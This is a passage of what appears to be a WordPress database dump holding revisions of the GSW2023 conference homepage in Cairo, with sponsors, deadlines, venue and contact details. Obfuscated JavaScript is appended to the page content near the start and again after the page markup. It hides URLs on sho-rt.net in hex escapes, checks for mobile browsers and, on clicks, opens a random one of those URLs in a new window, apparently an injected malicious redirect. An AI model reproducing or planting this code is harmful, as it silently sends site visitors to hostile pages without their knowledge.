_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:50:56','2023-04-02 01:50:56','',3066,'https://gsw2023.com/?p=3992',0,'revision','',0),
(3993,1,'2023-04-02 01:51:46','2023-04-02 01:51:46','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400250324{margin-top: 105px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400128548{margin-top: 85px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 